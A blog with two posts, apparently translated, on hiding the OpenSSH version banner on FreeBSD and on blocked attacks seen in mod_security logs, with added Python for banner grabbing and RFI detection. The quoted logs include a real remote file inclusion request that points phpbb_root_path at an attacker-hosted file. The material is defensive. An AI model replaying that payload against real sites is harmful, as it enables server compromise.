Service Banner Faking in FreeBSD

12 01 2008

This is a simple howto on faking a service banner. Service banners often reveal a lot: the real software running, its version number, and so on. Anyone who reads the banner can pick an exploit that matches that exact version, so leaking it makes the machine an easier target. Keep in mind that this does NOT make your machine/server more secure against exploits if you run a vulnerable service. This article only aims to fake the banner and, in that way, fool the script kiddies. Your system is still vulnerable to an exploit if you run a vulnerable service: if a script kiddie runs his exploit anyway, even though he sees you are not sending out the expected banner, you can still be attacked. So always keep your system up to date, and see this as a way to decrease the number of attacks on your system, not as a way to become invulnerable.

Let's start changing the service banner. In this case I will explain how to change the SSH service banner.

Current SSH banner = SSH-2.0-OpenSSH_x.x (FreeBSD default)

Wanted SSH banner = SSH-2.0-just_look_at_me be_with_you_forever

Hmmmm... how? It's simple, just follow these steps.

Open version.h, located in /usr/src/crypto/openssh/, and edit these lines (SSH_VERSION_BASE is the part of the banner before the space, SSH_VERSION_ADDENDUM the part after it):

#define SSH_VERSION (ssh_version_get())
#define SSH_RELEASE (ssh_version_get())
#define SSH_VERSION_BASE "just_look_at_me"
#define SSH_VERSION_ADDENDUM "be_with_you_forever"

Save version.h, then go to /usr/src/secure/lib/libssh. Rebuild and install there, and restart your SSH service so sshd picks up the new string:

make obj && make depend && make && make install

/etc/rc.d/ssh restart

Want to see the change? Just telnet to port 22 of your SSH server, or use nmap: nmap -sV will simply report whatever string you put in the banner. Bear in mind that the key-exchange algorithm list sent right after the banner still fingerprints the implementation, which is one more reason not to rely on this.
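Here is a small banner grabber as an added example (my own code, not from the post or from OpenSSH/FreeBSD) that does the telnet check programmatically. It reads the server greeting and splits it the way RFC 4253 defines it: SSH-protoversion-softwareversion, a space, then a free-form comment. The softwareversion field is exactly what SSH_VERSION_BASE becomes and is the part a version scanner keys on; the addendum becomes the comment. The two sample banners are constructed, and the OpenSSH version number in the "default" one is only illustrative.

```python
import re
import socket

# RFC 4253 section 4.2: "SSH-protoversion-softwareversion SP comments CR LF".
# softwareversion and comments are what SSH_VERSION_BASE and
# SSH_VERSION_ADDENDUM from version.h end up as on the wire.
IDENT_RE = re.compile(rb"^SSH-(?P<proto>[0-9.]+)-(?P<software>[^ ]+)(?: (?P<comment>.*))?$")

# Constructed samples (not captured from a real host): a FreeBSD-style stock
# banner with an illustrative version, and the faked one built above.
DEFAULT_BANNER = b"SSH-2.0-OpenSSH_4.5p1 FreeBSD-20061110\r\n"
FAKED_BANNER = b"SSH-2.0-just_look_at_me be_with_you_forever\r\n"


def parse_ssh_banner(data: bytes):
    """Return (protoversion, softwareversion, comment) from the bytes a server sent.

    Lines that do not start with "SSH-" are skipped: RFC 4253 allows a server
    to send other lines before the identification string, and a client must
    ignore them.  Raises ValueError if no identification string is present.
    """
    for line in data.split(b"\n"):
        line = line.rstrip(b"\r")
        if not line.startswith(b"SSH-"):
            continue
        m = IDENT_RE.match(line)
        if m is None:
            raise ValueError(f"malformed identification string: {line!r}")
        comment = m.group("comment")
        return (
            m.group("proto").decode("ascii"),
            m.group("software").decode("ascii", "replace"),
            comment.decode("ascii", "replace") if comment is not None else "",
        )
    raise ValueError("no SSH identification string in data")


def looks_versioned(banner: bytes) -> bool:
    """True if the softwareversion field still carries a dotted version
    number (e.g. "OpenSSH_4.5p1"), i.e. still tells a scanner what to exploit."""
    _, software, _ = parse_ssh_banner(banner)
    return re.search(r"[0-9]+\.[0-9]+", software) is not None


def grab_banner(host: str, port: int = 22, timeout: float = 5.0) -> bytes:
    """Connect and read the greeting, the same bytes 'telnet host 22' shows.
    4096 bytes is plenty: the identification line itself is capped at 255."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        return sock.recv(4096)


if __name__ == "__main__":
    import sys
    # With a host argument, query it; without one, show the constructed faked banner.
    raw = grab_banner(sys.argv[1]) if len(sys.argv) > 1 else FAKED_BANNER
    proto, software, comment = parse_ssh_banner(raw)
    print(f"protocol={proto} software={software!r} comment={comment!r}")
    print("still reveals a version:", looks_versioned(raw))
```

Run it against the rebuilt server (python3 sshbanner.py your.host) and the software field should come back as just_look_at_me with no version number in it.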

Simple? Yeah...

Tested on FreeBSD 6.0-STABLE, FreeBSD 6.2-RELEASE and FreeBSD 6.3-PRERELEASE, and it works :)

And what about the Apache web server? Just use the add-on module called mod_security (ModSecurity), a cool extra module for Apache; its SecServerSignature directive rewrites the Server header. How? Read my previous article on my Friendster blog :)

Okay, time to sleep now... bye





When Script Kiddies Attack

28 10 2007

Whew... college has started again (even though I rarely show up :D). Hmm, I left this server alone for about a week, hahaha, and the logs had really piled up... heaps of them!!!! Hahaha, basically that's me being dumb: I forgot to set up a crontab to rotate all those logs. Yesterday I looked at the web server log (the mod_security log), good grief, there was so much!!!!! I got dizzy reading it...

Judging from the logs, an attack comes in every 15 minutes on average. Everything from spam to RFI and LFI... hmmmmmmmm... here is a small piece of the log (RFI):

==953aa80c==============================
Request: xxxxx.xxxxxx.x.x 72.149.42.126 - - [24/Oct/2007:23:30:33 +0700] "GET /web/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 500 1353 "-" "libwww-perl/5.65" - "-"
----------------------------------------
GET /web/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: xxxxx.xxxx.xxxxx
User-Agent: libwww-perl/5.65
mod_security-message: Access denied with code 500. Pattern match "phpbb_root_path" at THE_REQUEST
mod_security-action: 500

HTTP/1.1 500 Internal Server Error
Last-Modified: Tue, 19 Jun 2007 03:22:03 GMT
ETag: "8576a-549-d1366cc0;628b3780"
Accept-Ranges: bytes
Content-Length: 1353
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
--953aa80c--

==7b81d714==============================
Request: xxxxx.xxxxx.x.x 72.149.42.126 - - [24/Oct/2007:23:30:34 +0700] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 500 1353 "-" "libwww-perl/5.65" - "-"
----------------------------------------
GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: xxxx.xxxxx.x.x
User-Agent: libwww-perl/5.65
mod_security-message: Access denied with code 500. Pattern match "phpbb_root_path" at THE_REQUEST
mod_security-action: 500

HTTP/1.1 500 Internal Server Error
Last-Modified: Tue, 19 Jun 2007 03:22:03 GMT
ETag: "8576a-549-d1366cc0;62e80900"
Accept-Ranges: bytes
Content-Length: 1353
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
--7b81d714--

(xxxxx.xxxxx.x.x deliberately masked)

That's only a tiny part of the log... if I dumped it all here, whoever reads it would be dead -______________-.
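As an added example (my own code, not from the post or from ModSecurity), here is a small Python parser for mod_security 1.x audit-log entries like the ones above. It pulls out every query parameter whose value is a remote URL, which is the RFI signature in the quoted requests (phpbb_root_path pointing at an attacker-hosted safe.txt), counts attempts per client address, and measures the gap between requests, which is where a figure like "one every 15 minutes" comes from. The sample log is constructed from the two quoted entries, with the vhost masked as in the post, plus one made-up benign request so the filter has something to ignore.

```python
import re
from collections import Counter
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: the two "Request:" entries quoted in the post (vhost
# masked exactly as there, audit headers trimmed) plus one made-up benign
# request 15 minutes later from a private address.
SAMPLE_AUDIT_LOG = r'''==953aa80c==============================
Request: xxxxx.xxxxxx.x.x 72.149.42.126 - - [24/Oct/2007:23:30:33 +0700] "GET /web/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 500 1353 "-" "libwww-perl/5.65" - "-"
----------------------------------------
mod_security-message: Access denied with code 500. Pattern match "phpbb_root_path" at THE_REQUEST
--953aa80c--

==7b81d714==============================
Request: xxxxx.xxxxx.x.x 72.149.42.126 - - [24/Oct/2007:23:30:34 +0700] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 500 1353 "-" "libwww-perl/5.65" - "-"
----------------------------------------
mod_security-message: Access denied with code 500. Pattern match "phpbb_root_path" at THE_REQUEST
--7b81d714--

==0badc0de==============================
Request: xxxxx.xxxxx.x.x 10.0.0.7 - - [24/Oct/2007:23:45:34 +0700] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0" - "-"
--0badc0de--
'''

# "Request:" line of a mod_security 1.x audit entry: the vhost, then the usual
# CLF fields (client, ident, authuser, [time], "request line", status, bytes,
# "referer", "user-agent"), followed by the unique id and "session id".
REQUEST_RE = re.compile(
    r'^Request: (?P<vhost>\S+) (?P<client>\S+) (?P<ident>\S+) (?P<authuser>\S+) '
    r'\[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"

# A parameter whose value is an absolute URL is the RFI signature: code doing
# include($phpbb_root_path . 'something.php') then fetches attacker-hosted
# PHP.  The trailing "?" in the quoted payload turns whatever the script
# appends into a query string, so the attacker's file is fetched unchanged.
REMOTE_URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def parse_audit_log(text: str) -> list:
    """Return one dict per "Request:" line; other lines of each entry are skipped."""
    events = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m is None:
            continue
        ev = m.groupdict()
        ev["time"] = datetime.strptime(ev["time"], TIME_FMT)
        ev["status"] = int(ev["status"])
        events.append(ev)
    return events


def find_rfi(events: list) -> list:
    """Return a hit for every query parameter whose value is a remote URL."""
    hits = []
    for ev in events:
        parts = urlsplit(ev["target"])
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_URL_RE.match(value):
                hits.append({
                    "time": ev["time"], "client": ev["client"], "ua": ev["ua"],
                    "path": parts.path, "param": name, "url": value,
                    "blocked": ev["status"] >= 400,  # mod_security answered 500 here
                })
    return hits


def seconds_between(events: list) -> list:
    """Gaps in seconds between consecutive events, the basis of a rate estimate."""
    times = sorted(ev["time"] for ev in events)
    return [(b - a).total_seconds() for a, b in zip(times, times[1:])]


def attackers(hits: list) -> Counter:
    """Number of RFI attempts per client address."""
    return Counter(h["client"] for h in hits)


if __name__ == "__main__":
    evs = parse_audit_log(SAMPLE_AUDIT_LOG)
    rfi = find_rfi(evs)
    for h in rfi:
        print(f'{h["time"]:%H:%M:%S} {h["client"]} {h["path"]} '
              f'{h["param"]}={h["url"]} blocked={h["blocked"]}')
    print("attempts per client:", dict(attackers(rfi)))
    print("seconds between requests:", seconds_between(evs))
```

Point it at a real audit log by reading the file into parse_audit_log instead of SAMPLE_AUDIT_LOG; requests with an absolute URL in a parameter and a 2xx status are the ones that got past the rules and deserve a look.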

What's rather annoying, though, is the rule for blocking spam. Wow, crazy, there are so many log entries from spam; some got blocked, some still slip right through -______________-.

Turns out securing a web application is harder than securing anything else -______-